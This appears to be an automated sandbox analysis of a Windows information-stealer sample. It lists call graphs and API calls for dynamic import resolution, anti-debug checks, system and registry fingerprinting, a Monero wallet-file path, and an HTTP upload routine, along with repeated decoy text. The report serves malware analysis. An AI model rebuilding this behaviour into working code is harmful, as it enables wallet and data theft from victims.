15370 3e07c3 15368->15370 15371 3e0874 15369->15371 15408 3e096b 15369->15408 15372 3d1590 lstrcpy 15370->15372 15373 3ea740 lstrcpy 15371->15373 15374 3e080c 15372->15374 15376 3e0881 15373->15376 15377 3ea7a0 lstrcpy 15374->15377 15375 3e099c StrCmpCA 15378 3e09ab 15375->15378 15379 3e0a2d 15375->15379 15380 3ea9b0 4 API calls 15376->15380 15381 3e0823 15377->15381 15383 3d1590 lstrcpy 15378->15383 
15379->13788 15384 3e08ac 15380->15384 15382 3ea7a0 lstrcpy 15381->15382 15385 3e083e 15382->15385 15386 3e09f4 15383->15386 15387 3ea920 3 API calls 15384->15387 16080 3dfb00 15385->16080 15389 3ea7a0 lstrcpy 15386->15389 15390 3e08b3 15387->15390 15391 3e0a0d 15389->15391 15392 3ea9b0 4 API calls 15390->15392 15393 3ea7a0 lstrcpy 15391->15393 15394 3e08ba 15392->15394 15396 3e0a28 15393->15396 15395 3ea8a0 lstrcpy 15394->15395 16196 3e0030 15396->16196 15408->15375 15728 3ea7a0 lstrcpy 15727->15728 15729 3d1683 15728->15729 15730 3ea7a0 lstrcpy 15729->15730 15731 3d1695 15730->15731 15732 3ea7a0 lstrcpy 15731->15732 15733 3d16a7 15732->15733 15734 3ea7a0 lstrcpy 15733->15734 15735 3d15a3 15734->15735 15735->14611 15737 3d47c6 15736->15737 15738 3d4838 lstrlen 15737->15738 15762 3eaad0 15738->15762 15740 3d4848 InternetCrackUrlA 15741 3d4867 15740->15741 15741->14688 15743 3ea740 lstrcpy 15742->15743 15744 3e8b74 15743->15744 15745 3ea740 lstrcpy 15744->15745 15746 3e8b82 GetSystemTime 15745->15746 15747 3e8b99 15746->15747 15748 3ea7a0 lstrcpy 15747->15748 15749 3e8bfc 15748->15749 15749->14703 15751 3ea931 15750->15751 15752 3ea988 15751->15752 15754 3ea968 lstrcpy lstrcat 15751->15754 15753 3ea7a0 lstrcpy 15752->15753 15755 3ea994 15753->15755 15754->15752 15755->14707 15756->14821 15758 3d9af9 LocalAlloc 15757->15758 15759 3d4eee 15757->15759 15758->15759 15760 3d9b14 CryptStringToBinaryA 15758->15760 15759->14709 15759->14712 15760->15759 15761 3d9b39 LocalFree 15760->15761 15761->15759 15762->15740 15763->14831 15764->14972 15765->14974 15766->14982 15895 3e77a0 15767->15895 15770 3e1c1e 15770->15064 15771 3e76c6 RegOpenKeyExA 15772 3e76e7 RegQueryValueExA 15771->15772 15773 3e7704 RegCloseKey 15771->15773 15772->15773 15773->15770 15775 3e1c99 15774->15775 15775->15078 15777 3e1e09 15776->15777 15777->15120 15779 3e7a9a wsprintfA 15778->15779 15780 3e1e84 15778->15780 15779->15780 15780->15134 15782 3e7b4d 15781->15782 15783 3e1efe 15781->15783 15902 3e8d20 
LocalAlloc CharToOemW 15782->15902 15783->15148 15786 3ea740 lstrcpy 15785->15786 15787 3e7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15786->15787 15794 3e7c25 15787->15794 15788 3e7d18 15790 3e7d1e LocalFree 15788->15790 15791 3e7d28 15788->15791 15789 3e7c46 GetLocaleInfoA 15789->15794 15790->15791 15793 3ea7a0 lstrcpy 15791->15793 15792 3ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15792->15794 15795 3e7d37 15793->15795 15794->15788 15794->15789 15794->15792 15796 3ea8a0 lstrcpy 15794->15796 15795->15161 15796->15794 15798 3e2008 15797->15798 15798->15176 15800 3e94b5 15799->15800 15801 3e9493 GetModuleFileNameExA CloseHandle 15799->15801 15802 3ea740 lstrcpy 15800->15802 15801->15800 15803 3e2091 15802->15803 15803->15191 15805 3e7e68 RegQueryValueExA 15804->15805 15806 3e2119 15804->15806 15807 3e7e8e RegCloseKey 15805->15807 15806->15205 15807->15806 15809 3e7fb9 GetLogicalProcessorInformationEx 15808->15809 15810 3e7fd8 GetLastError 15809->15810 15815 3e8029 15809->15815 15811 3e8022 15810->15811 15820 3e7fe3 15810->15820 15813 3e2194 15811->15813 15817 3e89f0 2 API calls 15811->15817 15813->15219 15816 3e89f0 2 API calls 15815->15816 15818 3e807b 15816->15818 15817->15813 15818->15811 15819 3e8084 wsprintfA 15818->15819 15819->15813 15820->15809 15820->15813 15903 3e89f0 15820->15903 15906 3e8a10 GetProcessHeap RtlAllocateHeap 15820->15906 15822 3e220f 15821->15822 15822->15233 15824 3e89b0 15823->15824 15825 3e814d GlobalMemoryStatusEx 15824->15825 15826 3e8163 __aulldiv 15825->15826 15827 3e819b wsprintfA 15826->15827 15828 3e2289 15827->15828 15828->15247 15830 3e87fb GetProcessHeap RtlAllocateHeap wsprintfA 15829->15830 15832 3ea740 lstrcpy 15830->15832 15833 3e230b 15832->15833 15833->15261 15835 3ea740 lstrcpy 15834->15835 15836 3e8229 15835->15836 15837 3e8263 15836->15837 15839 3ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15836->15839 15841 3ea8a0 lstrcpy 15836->15841 15838 3ea7a0 lstrcpy 15837->15838 15840 3e82dc 15838->15840 15839->15836 
15840->15278 15841->15836 15843 3ea740 lstrcpy 15842->15843 15844 3e835c RegOpenKeyExA 15843->15844 15845 3e83ae 15844->15845 15846 3e83d0 15844->15846 15847 3ea7a0 lstrcpy 15845->15847 15848 3e83f8 RegEnumKeyExA 15846->15848 15849 3e8613 RegCloseKey 15846->15849 15860 3e83bd 15847->15860 15850 3e860e 15848->15850 15851 3e843f wsprintfA RegOpenKeyExA 15848->15851 15852 3ea7a0 lstrcpy 15849->15852 15850->15849 15853 3e8485 RegCloseKey RegCloseKey 15851->15853 15854 3e84c1 RegQueryValueExA 15851->15854 15852->15860 15857 3ea7a0 lstrcpy 15853->15857 15855 3e84fa lstrlen 15854->15855 15856 3e8601 RegCloseKey 15854->15856 15855->15856 15858 3e8510 15855->15858 15856->15850 15857->15860 15859 3ea9b0 4 API calls 15858->15859 15861 3e8527 15859->15861 15860->15304 15862 3ea8a0 lstrcpy 15861->15862 15863 3e8533 15862->15863 15864 3ea9b0 4 API calls 15863->15864 15865 3e8557 15864->15865 15866 3ea8a0 lstrcpy 15865->15866 15867 3e8563 15866->15867 15868 3e856e RegQueryValueExA 15867->15868 15868->15856 15869 3e85a3 15868->15869 15870 3ea9b0 4 API calls 15869->15870 15871 3e85ba 15870->15871 15872 3ea8a0 lstrcpy 15871->15872 15873 3e85c6 15872->15873 15874 3ea9b0 4 API calls 15873->15874 15875 3e85ea 15874->15875 15876 3ea8a0 lstrcpy 15875->15876 15877 3e85f6 15876->15877 15877->15856 15879 3ea740 lstrcpy 15878->15879 15880 3e86bc CreateToolhelp32Snapshot Process32First 15879->15880 15881 3e875d CloseHandle 15880->15881 15882 3e86e8 Process32Next 15880->15882 15883 3ea7a0 lstrcpy 15881->15883 15882->15881 15887 3e86fd 15882->15887 15885 3e8776 15883->15885 15884 3ea8a0 lstrcpy 15884->15887 15885->15336 15886 3ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15886->15887 15887->15882 15887->15884 15887->15886 15889 3ea7a0 lstrcpy 15888->15889 15890 3e51b5 15889->15890 15891 3d1590 lstrcpy 15890->15891 15892 3e51c6 15891->15892 15907 3d5100 15892->15907 15894 3e51cf 15894->15348 15898 3e7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15895->15898 15897 3e76b9 15897->15770 15897->15771 
15899 3e7765 RegQueryValueExA 15898->15899 15900 3e7780 RegCloseKey 15898->15900 15899->15900 15901 3e7793 15900->15901 15901->15897 15902->15783 15904 3e8a0c 15903->15904 15905 3e89f9 GetProcessHeap HeapFree 15903->15905 15904->15820 15905->15904 15906->15820 15908 3ea7a0 lstrcpy 15907->15908 15909 3d5119 15908->15909 15910 3d47b0 2 API calls 15909->15910 15911 3d5125 15910->15911 16067 3e8ea0 15911->16067 15913 3d5184 15914 3d5192 lstrlen 15913->15914 15915 3d51a5 15914->15915 15916 3e8ea0 4 API calls 15915->15916 15917 3d51b6 15916->15917 15918 3ea740 lstrcpy 15917->15918 15919 3d51c9 15918->15919 15920 3ea740 lstrcpy 15919->15920 15921 3d51d6 15920->15921 15922 3ea740 lstrcpy 15921->15922 15923 3d51e3 15922->15923 15924 3ea740 lstrcpy 15923->15924 15925 3d51f0 15924->15925 15926 3ea740 lstrcpy 15925->15926 15927 3d51fd InternetOpenA StrCmpCA 15926->15927 15928 3d522f 15927->15928 15929 3d58c4 InternetCloseHandle 15928->15929 15930 3e8b60 3 API calls 15928->15930 15936 3d58d9 ctype 15929->15936 15931 3d524e 15930->15931 15932 3ea920 3 API calls 15931->15932 15933 3d5261 15932->15933 15934 3ea8a0 lstrcpy 15933->15934 15935 3d526a 15934->15935 15937 3ea9b0 4 API calls 15935->15937 15940 3ea7a0 lstrcpy 15936->15940 15938 3d52ab 15937->15938 15939 3ea920 3 API calls 15938->15939 15941 3d52b2 15939->15941 15948 3d5913 15940->15948 15942 3ea9b0 4 API calls 15941->15942 15943 3d52b9 15942->15943 15944 3ea8a0 lstrcpy 15943->15944 15945 3d52c2 15944->15945 15946 3ea9b0 4 API calls 15945->15946 15947 3d5303 15946->15947 15949 3ea920 3 API calls 15947->15949 15948->15894 15950 3d530a 15949->15950 15951 3ea8a0 lstrcpy 15950->15951 15952 3d5313 15951->15952 15953 3d5329 InternetConnectA 15952->15953 15953->15929 15954 3d5359 HttpOpenRequestA 15953->15954 15956 3d58b7 InternetCloseHandle 15954->15956 15957 3d53b7 15954->15957 15956->15929 15958 3ea9b0 4 API calls 15957->15958 15959 3d53cb 15958->15959 15960 3ea8a0 lstrcpy 15959->15960 15961 3d53d4 15960->15961 15962 3ea920 3 
API calls 15961->15962 15963 3d53f2 15962->15963 15964 3ea8a0 lstrcpy 15963->15964 15965 3d53fb 15964->15965 15966 3ea9b0 4 API calls 15965->15966 15967 3d541a 15966->15967 15968 3ea8a0 lstrcpy 15967->15968 15969 3d5423 15968->15969 15970 3ea9b0 4 API calls 15969->15970 15971 3d5444 15970->15971 15972 3ea8a0 lstrcpy 15971->15972 15973 3d544d 15972->15973 15974 3ea9b0 4 API calls 15973->15974 15975 3d546e 15974->15975 15976 3ea8a0 lstrcpy 15975->15976 16068 3e8ead CryptBinaryToStringA 16067->16068 16069 3e8ea9 16067->16069 16068->16069 16070 3e8ece GetProcessHeap RtlAllocateHeap 16068->16070 16069->15913 16070->16069 16071 3e8ef4 ctype 16070->16071 16072 3e8f05 CryptBinaryToStringA 16071->16072 16072->16069 16076->15351 16319 3d9880 16077->16319 16079 3d98e1 16079->15358 16081 3ea740 lstrcpy 16080->16081 16082 3dfb16 16081->16082 16357 3e8de0 16082->16357 16254 3ea740 lstrcpy 16253->16254 16255 3e0266 16254->16255 16256 3e8de0 2 API calls 16255->16256 16257 3e027b 16256->16257 16258 3ea920 3 API calls 16257->16258 16259 3e028b 16258->16259 16260 3ea8a0 lstrcpy 16259->16260 16261 3e0294 16260->16261 16262 3ea9b0 4 API calls 16261->16262 16263 3e02b8 16262->16263 16320 3d988d 16319->16320 16323 3d6fb0 16320->16323 16322 3d98ad ctype 16322->16079 16326 3d6d40 16323->16326 16327 3d6d63 16326->16327 16339 3d6d59 16326->16339 16327->16339 16340 3d6660 16327->16340 16329 3d6dbe 16329->16339 16346 3d69b0 16329->16346 16331 3d6e2a 16332 3d6ee6 VirtualFree 16331->16332 16334 3d6ef7 16331->16334 16331->16339 16332->16334 16333 3d6f41 16337 3e89f0 2 API calls 16333->16337 16333->16339 16334->16333 16335 3d6f38 16334->16335 16336 3d6f26 FreeLibrary 16334->16336 16338 3e89f0 2 API calls 16335->16338 16336->16334 16337->16339 16338->16333 16339->16322 16341 3d668f VirtualAlloc 16340->16341 16343 3d6730 16341->16343 16345 3d673c 16341->16345 16344 3d6743 VirtualAlloc 16343->16344 16343->16345 16344->16345 16345->16329 16347 3d69c9 16346->16347 16351 3d69d5 16346->16351 16348 3d6a09 
LoadLibraryA 16347->16348 16347->16351 16349 3d6a32 16348->16349 16348->16351 16353 3d6ae0 16349->16353 16356 3e8a10 GetProcessHeap RtlAllocateHeap 16349->16356 16351->16331 16352 3d6ba8 GetProcAddress 16352->16351 16352->16353 16353->16351 16353->16352 16354 3e89f0 2 API calls 16354->16353 16355 3d6a8b 16355->16351 16355->16354 16356->16355

                      Control-flow Graph
                      control_flow_graph 660 3e9860-3e9874 call 3e9750 663 3e987a-3e9a8e call 3e9780 GetProcAddress * 21 660->663 664 3e9a93-3e9af2 LoadLibraryA * 5 660->664 663->664 666 3e9b0d-3e9b14 664->666 667 3e9af4-3e9b08 GetProcAddress 664->667 669 3e9b46-3e9b4d 666->669 670 3e9b16-3e9b41 GetProcAddress * 2 666->670 667->666 671 3e9b4f-3e9b63 GetProcAddress 669->671 672 3e9b68-3e9b6f 669->672 670->669 671->672 673 3e9b89-3e9b90 672->673 674 3e9b71-3e9b84 GetProcAddress 672->674 675 3e9b92-3e9bbc GetProcAddress * 2 673->675 676 3e9bc1-3e9bc2 673->676 674->673 675->676
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,01082230), ref: 003E98A1
                      • GetProcAddress.KERNEL32(74DD0000,010822F0), ref: 003E98BA
                      • GetProcAddress.KERNEL32(74DD0000,010821B8), ref: 003E98D2
                      • GetProcAddress.KERNEL32(74DD0000,01082440), ref: 003E98EA
                      • GetProcAddress.KERNEL32(74DD0000,010823E0), ref: 003E9903
                      • GetProcAddress.KERNEL32(74DD0000,01088E60), ref: 003E991B
                      • GetProcAddress.KERNEL32(74DD0000,01075690), ref: 003E9933
                      • GetProcAddress.KERNEL32(74DD0000,010758B0), ref: 003E994C
                      • GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003E9964
                      • GetProcAddress.KERNEL32(74DD0000,01082290), ref: 003E997C
                      • GetProcAddress.KERNEL32(74DD0000,010823F8), ref: 003E9995
                      • GetProcAddress.KERNEL32(74DD0000,01082458), ref: 003E99AD
                      • GetProcAddress.KERNEL32(74DD0000,010756F0), ref: 003E99C5
                      • GetProcAddress.KERNEL32(74DD0000,01082350), ref: 003E99DE
                      • GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003E99F6
                      • GetProcAddress.KERNEL32(74DD0000,01075850), ref: 003E9A0E
                      • GetProcAddress.KERNEL32(74DD0000,01082428), ref: 003E9A27
                      • GetProcAddress.KERNEL32(74DD0000,01082260), ref: 003E9A3F
                      • GetProcAddress.KERNEL32(74DD0000,010756B0), ref: 003E9A57
                      • GetProcAddress.KERNEL32(74DD0000,010822A8), ref: 003E9A70
                      • GetProcAddress.KERNEL32(74DD0000,010759B0), ref: 003E9A88
                      • LoadLibraryA.KERNEL32(010821D0,?,003E6A00), ref: 003E9A9A
                      • LoadLibraryA.KERNEL32(01082320,?,003E6A00), ref: 003E9AAB
                      • LoadLibraryA.KERNEL32(010821E8,?,003E6A00), ref: 003E9ABD
                      • LoadLibraryA.KERNEL32(01082338,?,003E6A00), ref: 003E9ACF
                      • LoadLibraryA.KERNEL32(01082170,?,003E6A00), ref: 003E9AE0
                      • GetProcAddress.KERNEL32(75A70000,01082278), ref: 003E9B02
                      • GetProcAddress.KERNEL32(75290000,01082188), ref: 003E9B23
                      • GetProcAddress.KERNEL32(75290000,01082368), ref: 003E9B3B
                      • GetProcAddress.KERNEL32(75BD0000,01082200), ref: 003E9B5D
                      • GetProcAddress.KERNEL32(75450000,01075730), ref: 003E9B7E
                      • GetProcAddress.KERNEL32(76E90000,01088F90), ref: 003E9B9F
                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 003E9BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 003E9BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 1e7e25b7ace2abe76804dbbe928c0ceb7bcaa18713b73d117844f50a4d558792
                      • Instruction ID: ff25942bdf00ea07d6136fa8eac393fdb9aa346708b50056d184980c1804df31
                      • Opcode Fuzzy Hash: 1e7e25b7ace2abe76804dbbe928c0ceb7bcaa18713b73d117844f50a4d558792
                      • Instruction Fuzzy Hash: 7BA16DB95022409FD385DFE9ED88AE237FBF74831170CE61BE605C32A5D6399542CB52

                      Control-flow Graph
                      control_flow_graph 764 3d45c0-3d4695 RtlAllocateHeap 781 3d46a0-3d46a6 764->781 782 3d46ac-3d474a 781->782 783 3d474f-3d47a9 VirtualProtect 781->783 782->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D460E
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003D479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D477B
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D462D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, joined with $)
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: d3108930387ff8498c5d14f24a585d0c74d1a47b0d10b9dfc430c28794d1f426
                      • Instruction ID: 2ff97c844a735dabcaff516ce6356989173b2d2d9243d6dce80273651733366b
                      • Opcode Fuzzy Hash: d3108930387ff8498c5d14f24a585d0c74d1a47b0d10b9dfc430c28794d1f426
                      • Instruction Fuzzy Hash: A241DE726E66087EEB2ABFA49C42EED7E765F46B08F509044EF14527A0CFB067034527

                      Control-flow Graph
                      control_flow_graph 801 3d4880-3d4942 call 3ea7a0 call 3d47b0 call 3ea740 * 5 InternetOpenA StrCmpCA 816 3d494b-3d494f 801->816 817 3d4944 801->817 818 3d4ecb-3d4ef3 InternetCloseHandle call 3eaad0 call 3d9ac0 816->818 819 3d4955-3d4acd call 3e8b60 call 3ea920 call 3ea8a0 call 3ea800 * 2 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea920 call 3ea8a0 call 3ea800 * 2 InternetConnectA 816->819 817->816 829 3d4ef5-3d4f2d call 3ea820 call 3ea9b0 call 3ea8a0 call 3ea800 818->829 830 3d4f32-3d4fa2 call 3e8990 * 2 call 3ea7a0 call 3ea800 * 8 818->830 819->818 905 3d4ad3-3d4ad7 819->905 829->830 906 3d4ad9-3d4ae3 905->906 907 3d4ae5 905->907 908 3d4aef-3d4b22 HttpOpenRequestA 906->908 907->908 909 3d4ebe-3d4ec5 InternetCloseHandle 908->909 910 3d4b28-3d4e28 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea740 call 3ea920 * 2 call 3ea8a0 call 3ea800 * 2 call 3eaad0 lstrlen call 3eaad0 * 2 lstrlen call 3eaad0 HttpSendRequestA 908->910 909->818 1021 3d4e32-3d4e5c InternetReadFile 910->1021 1022 3d4e5e-3d4e65 1021->1022 1023 3d4e67-3d4eb9 InternetCloseHandle call 3ea800 1021->1023 1022->1023 1024 3d4e69-3d4ea7 call 3ea9b0 call 3ea8a0 call 3ea800 1022->1024 1023->909 1024->1021
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003D4915
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D4ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003F0DDB,00000000,?,?,00000000,?,",00000000,?,0108E9D8), ref: 003D4DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003D4E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003D4E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003D4E49
                      • InternetCloseHandle.WININET(00000000), ref: 003D4EAD
                      • InternetCloseHandle.WININET(00000000), ref: 003D4EC5
                      • HttpOpenRequestA.WININET(00000000,0108E7F8,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D4B15
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • InternetCloseHandle.WININET(00000000), ref: 003D4ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: b2daa9293317314cf7bcb156d792d3078d1844ac52e3dbce96868c16887deef1
                      • Instruction ID: c6c42e245804e3cd6cf854ca87be08459e56ee064d990473473c8a50a0191e7f
                      • Opcode Fuzzy Hash: b2daa9293317314cf7bcb156d792d3078d1844ac52e3dbce96868c16887deef1
                      • Instruction Fuzzy Hash: 50125F72910668AADB16EB91DC92FEEB779AF14300F514299F106660D2DF303F49CF62
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003D11B7), ref: 003E7880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 003E789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
